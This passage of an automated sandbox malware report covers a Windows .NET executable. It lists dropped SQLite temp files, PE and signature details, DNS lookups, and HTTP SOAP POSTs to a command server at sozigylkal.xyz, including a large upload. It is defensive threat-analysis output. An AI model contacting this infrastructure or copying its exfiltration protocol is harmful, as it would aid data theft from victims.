C:\Users\user\AppData\Local\Temp\tmpB81.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpB92.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped

Copyright Joe Security LLC 2021 Page 14 of 23 C:\Users\user\AppData\Local\Temp\tmpB92.tmp Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpB93.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpB94.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpB95.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE

Copyright Joe Security LLC 2021 Page 15 of 23 C:\Users\user\AppData\Local\Temp\tmpB95.tmp Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpBC5.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpD103.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpD104.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpD105.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001

Copyright Joe Security LLC 2021 Page 16 of 23 C:\Users\user\AppData\Local\Temp\tmpD105.tmp Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpD106.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpD136.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

C:\Users\user\AppData\Local\Temp\tmpD137.tmp Process: C:\Users\user\Desktop\3jdkEgyWkk.exe File Type: SQLite 3.x database, last written using SQLite version 3032001 Category: dropped Size (bytes): 73728 Entropy (8bit): 1.1874185457069584 Encrypted: false SSDEEP: 96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq MD5: 72A43D390E478BA9664F03951692D109 SHA1: 482FE43725D7A1614F6E24429E455CD0A920DF7C SHA-256: 593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C

Copyright Joe Security LLC 2021 Page 17 of 23 C:\Users\user\AppData\Local\Temp\tmpD137.tmp SHA-512: FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7 CE Malicious: false Preview: SQLite format 3...... @ ...... $...... C......

Static File Info

General File type: PE32 executable (GUI) Intel 80386 Mono/.Net assemb ly, for MS Windows Entropy (8bit): 7.178772447159369 TrID: Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% File name: 3jdkEgyWkk.exe File size: 1867800 MD5: ca1a62feb27816580db61309ab443a61 SHA1: 81464d4f737875e4a8b7f45340d0e4a3729f92ce SHA256: f7b9325ac03957eaeadea70155fa1ab9f2df37a07af94146 65b8f79c8249ee64 SHA512: e89772e0ede5da977da1f6b074a31fd7240615dd24425ca 606981e4ac1ea126ccb4d2ac3e6a70fc5c77812ae4da7e aa52f728fc2db63a38a5d99e2c8039a0372 SSDEEP: 24576:4P4O1brwerQIWONYxBqSOF7nndOLwfAyX0gV 2ozVwTGhPGEd:y5rweFWONYxcSM7n5kh2VwTgv File Content Preview: MZ...... @...... !..L.!Th is program cannot be run in DOS mode....$...... PE..L.... -y...... t...... @...... 4.... @......

File Icon

Icon Hash: e0c6a65225a2c6e0

Static PE Info

General Entrypoint: 0x430c1e Entrypoint Section: .text Digitally signed: true Imagebase: 0x400000 Subsystem: windows gui Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT Time Stamp: 0xD9792DDE [Tue Aug 14 03:17:50 2085 UTC] TLS Callbacks: CLR (.Net) Version: v4.0.30319 OS Version Major: 4 OS Version Minor: 0 File Version Major: 4 File Version Minor: 0 Subsystem Version Major: 4 Subsystem Version Minor: 0 Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Copyright Joe Security LLC 2021 Page 18 of 23 Authenticode Signature

Signature Valid: false Signature Issuer: CN=Bosch S6 AGM/S5 AGM Signature Validation Error: A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider Error Number: -2146762487 Not Before, Not After 6/23/2021 12:12:06 PM 6/24/2031 12:12:06 PM Subject Chain CN=Bosch S6 AGM/S5 AGM Version: 3 Thumbprint MD5: FF4F98DAED8361E8F8911C7EB349C398 Thumbprint SHA-1: 6874402A4B779CA08D0D02261792C9DBEC5F0C52 Thumbprint SHA-256: C2A539F20ADA8C6DC84F8092BB9D8F0D8424683833CC6B07FBC01CCFDF0546FE Serial: 1F863B470D9CA19A44E8D97CC1BCBF32

Entrypoint Preview

Data Directories

Sections

Name Virtual Address Virtual Size Raw Size Xored PE ZLIB Complexity File Type Entropy Characteristics .text 0x2000 0x2ec24 0x2ee00 False 0.483463541667 data 6.262205754 IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ .sdata 0x32000 0xeba 0x1000 False 0.44384765625 data 4.13930438754 IMAGE_SCN_CNT_INITIALIZED_D ATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ .rsrc 0x34000 0x19617c 0x196200 False 0.581822652162 data 7.17608088618 IMAGE_SCN_CNT_INITIALIZED_D ATA, IMAGE_SCN_MEM_READ .reloc 0x1cc000 0xc 0x200 False 0.044921875 data 0.0815394123432 IMAGE_SCN_CNT_INITIALIZED_D ATA, IMAGE_SCN_MEM_DISCARDABL E, IMAGE_SCN_MEM_READ

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Source Dest Timestamp Protocol SID Message Port Port Source IP Dest IP 06/25/21- TCP 100000122 COMMUNITY WEB-MISC mod_jrun overflow attempt 49733 80 192.168.2.3 212.80.219.75 09:37:11.675248 06/25/21- TCP 100000122 COMMUNITY WEB-MISC mod_jrun overflow attempt 49733 80 192.168.2.3 212.80.219.75 09:37:12.604529 06/25/21- TCP 100000122 COMMUNITY WEB-MISC mod_jrun overflow attempt 49733 80 192.168.2.3 212.80.219.75 09:37:12.604654 06/25/21- TCP 100000122 COMMUNITY WEB-MISC mod_jrun overflow attempt 49733 80 192.168.2.3 212.80.219.75 09:37:12.604738 06/25/21- TCP 100000122 COMMUNITY WEB-MISC mod_jrun overflow attempt 49733 80 192.168.2.3 212.80.219.75 09:37:12.604833

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries Copyright Joe Security LLC 2021 Page 19 of 23 Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Jun 25, 2021 09:35:22.656025887 CEST 192.168.2.3 8.8.8.8 0x7f42 Standard query sozigylkal.xyz A (IP address) IN (0x0001) (0) Jun 25, 2021 09:35:25.065288067 CEST 192.168.2.3 8.8.8.8 0x36aa Standard query api.ip.sb A (IP address) IN (0x0001) (0) Jun 25, 2021 09:35:25.133012056 CEST 192.168.2.3 8.8.8.8 0x7dd5 Standard query api.ip.sb A (IP address) IN (0x0001) (0) Jun 25, 2021 09:37:10.178442955 CEST 192.168.2.3 8.8.8.8 0xe740 Standard query sozigylkal.xyz A (IP address) IN (0x0001) (0)

DNS Answers

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class Jun 25, 2021 8.8.8.8 192.168.2.3 0x7f42 No error (0) sozigylkal.xyz 212.80.219.75 A (IP address) IN (0x0001) 09:35:22.715095997 CEST Jun 25, 2021 8.8.8.8 192.168.2.3 0x36aa No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.n CNAME IN (0x0001) 09:35:25.124619961 et (Canonical CEST name) Jun 25, 2021 8.8.8.8 192.168.2.3 0x7dd5 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.n CNAME IN (0x0001) 09:35:25.188754082 et (Canonical CEST name) Jun 25, 2021 8.8.8.8 192.168.2.3 0xe740 No error (0) sozigylkal.xyz 212.80.219.75 A (IP address) IN (0x0001) 09:37:10.245373011 CEST Jun 25, 2021 8.8.8.8 192.168.2.3 0xde0 No error (0) prda.aadg. www.tm.a.prd.aadg.traffic CNAME IN (0x0001) 09:37:11.397559881 msidentity.com manager.net (Canonical CEST name)

HTTP Request Dependency Graph

sozigylkal.xyz

HTTP Packets

Session ID Source IP Source Port Destination IP Destination Port Process 0 192.168.2.3 49723 212.80.219.75 80 C:\Users\user\Desktop\3jdkEgyWkk.exe

kBytes Timestamp transferred Direction Data Jun 25, 2021 1044 OUT POST / HTTP/1.1 09:35:23.034172058 CEST Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetArguments" Host: sozigylkal.xyz Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive Jun 25, 2021 1044 IN HTTP/1.1 100 Continue 09:35:23.079916000 CEST

Copyright Joe Security LLC 2021 Page 20 of 23 kBytes Timestamp transferred Direction Data Jun 25, 2021 1046 IN HTTP/1.1 200 OK 09:35:23.242171049 CEST Server: nginx Date: Fri, 25 Jun 2021 07:35:23 GMT Content-Type: text/xml; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 33 64 39 0d 0a 1f 8b 08 00 00 00 00 00 02 03 bd 58 6d 8f e2 36 10 fe 2b 11 d2 4a 57 74 4b b8 6e bb 3d 21 0e 89 97 40 51 97 5d 8e 70 7b ad 94 2f c6 99 25 2e 8e 27 b2 9d 0d ac ee c7 d7 09 09 77 2c d7 aa c4 b4 12 22 f1 8c e7 c9 78 3c 1e 3f 76 57 75 3c f1 0c 1c 13 70 b6 31 17 aa a3 3e 34 22 ad 93 8e eb 2a 1a 41 4c 54 cb c8 15 92 a4 85 72 ed e6 2f 2e 94 16 6e a3 d7 55 9d 01 86 bb 5e 77 02 ba 2f d7 69 0c 42 ab 05 a8 04 85 2a 11 0f 78 1a e2 24 95 ac c0 69 9c 58 a4 5c 97 1e 90 0f 8d 81 c4 4c 81 f4 b6 1a 84 62 28 1a a5 8a 1d c0 b2 2c 6b 65 37 05 d6 8f ed f6 3b f7 f7 d9 9d 5f f8 7b cd 84 d2 44 50 30 9f 20 9d 01 47 ba 81 70 88 a9 d0 72 57 a2 ac 4e 86 18 33 2a 51 e1 93 6e 51 8c 73 c0 1b f7 5d db f5 41 32 c2 d9 0b d1 c6 05 b7 2f 25 d9 a9 86 fb 0d ec 74 7e 31 c4 87 d5 9f 40 f5 4f 3d 2d 53 e8 ba 5f db 07 d5 ed 2b d5 6d ae f2 29 11 65 ac d4 41 7f 24 2c 3b 0d 23 89 31 54 d2 39 d1 91 ba 84 eb bd ee aa a3 b4 64 62 dd bb fa e4 7b 8b f9 e2 61 3c bd f3 ae 82 7e 92 8c 88 26 c1 1d 52 c2 83 01 d1 9a 43 4b 80 ee ba 07 83 7f 67 5a 38 ce d2 38 f8 64 1c 77 72 c5 d9 10 13 c4 35 87 3d 12 58 e3 bc d9 be bf fd c1 06 6c 81 24 36 da e0 21 01 49 1c df c4 39 23 12 82 b3 dd 99 91 84 83 af d3 90 61 e9 ce 9c a7 ca 62 7c 53 c9 42 bb 48 ff e2 6b 22 cb ff fa 28 43 53 11 ca 4c b5 41 89 20 44 6d 01 f0 c8 9e 09 0f 99 05 c2 6f 66 4e 4c a3 3e 80 c7 a1 28 8f 8e 7d 38 bc 84 51 67 2e cd 98 e8 ee 02 70 e9 10 5f 66 10 32 33 3a 49 84 05 d0 18 84 64 d2 99 0a 1a f8 1c 58 22 98 fc 39 50 a0 75 be 44 62 0c 53 0e ea 50 04 1e 19 64 20 cf 4f 05 f3 ca 99 20 13 89 69 12 0c 99 b1 40 9b cc 42 cc 50 54 8f fa 38 9c c1 8a d8 38 f2 d1 ec 3f 7e 2a 9f 2c 20 1e e4 8a 69 ab 35 3f 44 33 4b 18 8c 24 59 5b 45 a3 1f b3 f5 3e 18 16 20 4b 94 34 b2 b0 ff 83 88 10 b6 e5 e3 02 35 68 1f 9b fa 00 37 b7 ed ca 0b 7b 6f 66 64 ab 23 14 37 36 15 ed 7a 66 98 9f cd 34 fb 49 aa 05 db 1c 9e f5 91 ee 19 b5 dd d1 87 48 cd ef 02 a1 b5 2c 82 45 7d b3 cb 94 19 61 bc b5 48 83 be 46 9b d5 3c 90 e4 19 0e 9c a4 68 5d 5f 20 f3 2a 46 19 78 e1 da 66 c2 ee 1f a7 a3 69 df 19 a2 4c 50 16 4c b4 12 4d 60 6c d6 3e 38 de d6 d0 2a 06 86 ff 9f 9f 9a 1a 48 7c fe dc c9 5d a2 71 49 56 ff bc ab ba 7f cb c3 2b 8a 3e 62 8a a2 0c 8f 68 7c 25 2b bb 8c 97 f3 23 75 de ae 54 cc 6c 94 c7 ca 42 f2 ad fa 3f a1 fd a9 19 48 22 f1 c9 7c e0 2a 18 81 da 68 4c be 34 5b 7a ab df 36 5b 21 d2 e6 db e6 06 76 e6 3f 23 9c 83 36 2f 0a 20 6c 7e 69 7f 3f d2 c7 70 48 f7 e7 c3 b3 01 dd d7 c3 ae 02 31 01 ba c1 ff ff 1c 54 91 fe 19 be 30 ce 49 30 66 12 9e 70 5b e3 d8 f0 99 68 90 f5 4c 8b ea 0d 28 6a 98 2e a3 d4 6c 89 86 2c c8 b0 86 75 b9 0f 4e 29 ec 69 42 0d 88 f7 09 d0 ad 2a 4e 3b 86 0f ee 56 75 63 70 ef 2d 27 fd a5 e7 2c 81 46 02 39 ae 99 e1 97 0 3 4e e8 e6 57 92 d5 c0 9b 21 0a 1a 31 1e 1a 72 6d d8 2a cd b3 42 05 73 c2 c1 c9 55 df c9 c9 d3 0c ac 72 d3 a7 12 40 1c 2 d e2 52 54 75 c8 2b d4 b1 be 90 94 ea a5 99 dd b5 7c d5 e3 20 2c 3b 3d ce ef 8f f4 79 bb 54 7d 2e 16 d4 71 15 a9 64 5d f 7 f4 be e6 54 58 5c fb 18 71 75 2b e4 7e bd 5e ea fd 05 21 da 59 98 6b 12 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3d9Xm6+JWtKn=!@Q]p{/%.'w,"x4"*ALTr/.nU^w/iB*x$iX\Lb(,ke7;_{DP0 GprWN3*QnQs]A2/% t~1@O=-S_+m)eA$,;#1T9db{a<~&RCKgZ88dwr5=Xl$6!I9#ab|SBHk"(CSLA DmofNL>(}8Qg.p_f23:IdX"9PuDbSPd O i@BPT88?~*, i5?D3K$Y[E> K45h7{ofd#76zf4IH,E}aHF8*H|]qIV+>bh|%+#uTlB?H"|*hL4[z6[!v?#6/ l~i? pH1T0I0fp[hL(j.l,uN)iB*N;Vucp-',F9NW!1rm*BsUr@-RTu+| ,;=yT}.qd]TX\qu+~^!Yk0

Session ID Source IP Source Port Destination IP Destination Port Process 1 192.168.2.3 49733 212.80.219.75 80 C:\Users\user\Desktop\3jdkEgyWkk.exe

kBytes Timestamp transferred Direction Data Jun 25, 2021 1138 OUT POST / HTTP/1.1 09:37:10.304205894 CEST Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest" Host: sozigylkal.xyz Content-Length: 1128197 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive Jun 25, 2021 1139 IN HTTP/1.1 100 Continue 09:37:10.349703074 CEST Jun 25, 2021 2265 IN HTTP/1.1 200 OK 09:37:11.308943987 CEST Server: nginx Date: Fri, 25 Jun 2021 07:37:11 GMT Content-Type: text/xml; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 45 ce cd 0a 83 30 10 04 e0 57 29 79 00 f7 1e d2 1c 0a 7d 01 0b bd 07 bb fe 80 c9 6e 33 51 ea db b7 8a d5 db 30 30 1f e3 60 ef 69 e6 51 94 2f 9f 38 26 58 5c 4d 5f 8a 5a 22 34 3d c7 80 ea d7 43 82 56 92 3b 5a 03 f1 be 20 e3 1d ec 4d 5e 8b 77 4f ce 43 bb 3c 9a 90 6a 7e 4f 8c 52 33 54 12 76 f6 40 0b 47 9d f2 b0 61 86 bc a3 3f 40 e7 13 ff 05 5c 3b 8e 2a 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83E0W)y}n3Q00`iQ/8&X\M_Z"4=CV;Z M^wOC

Copyright Joe Security LLC 2021 Page 21 of 23 kBytes Timestamp transferred Direction Data Jun 25, 2021 3867 IN HTTP/1.1 200 OK 09:37:13.204968929 CEST Server: nginx Date: Fri, 25 Jun 2021 07:37:13 GMT Content-Type: text/xml; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 02 03 65 8f c1 0a c2 30 0c 86 5f 45 7a 77 99 7a 2b 5d 0f 03 f1 a2 17 45 f0 5a b6 e0 0a 5b 5b 96 cc ce b7 77 8e 3a 41 6f e1 4f f2 e5 8b 22 b9 77 0f 6c 7d c0 d5 d8 b5 8e 24 15 a2 61 0e 12 80 aa 06 3b 43 d9 94 93 37 21 f3 fd 1d de 05 60 da 00 a1 15 c9 d2 d7 4f ad 0e c8 d7 50 1b 46 3a 23 05 ef 28 f1 16 1a 63 17 86 de ce 14 f1 33 3f b4 9c ae 9b 42 94 bd 8f 84 fd 7e 64 74 64 bd 13 a9 65 17 54 8c 31 8b bb 99 b4 cd f3 0d dc 4e c7 cb ec ba b6 8e d8 b8 0a 05 68 05 ff 4a 53 f8 f1 85 ef e3 fa 05 18 8f 8c 84 05 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b3e0_Ezwz+]EZ[[w:AoO"wl}$a;C7!`OPF:#(c3?B~dtdeT1NhJS0

Code Manipulations

Statistics

System Behavior

Analysis Process: 3jdkEgyWkk.exe PID: 256 Parent PID: 5792

General

Start time: 09:35:02 Start date: 25/06/2021 Path: C:\Users\user\Desktop\3jdkEgyWkk.exe Wow64 process (32bit): true Commandline: 'C:\Users\user\Desktop\3jdkEgyWkk.exe' Imagebase: 0x230000 File size: 1867800 bytes MD5 hash: CA1A62FEB27816580DB61309AB443A61 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: low

File Activities Show Windows behavior

File Created

File Deleted

File Read

Registry Activities Show Windows behavior

Disassembly

Copyright Joe Security LLC 2021 Page 22 of 23 Code Analysis

Copyright Joe Security LLC Joe Sandbox Cloud Basic 32.0.0 Black Diamond

Copyright Joe Security LLC 2021 Page 23 of 23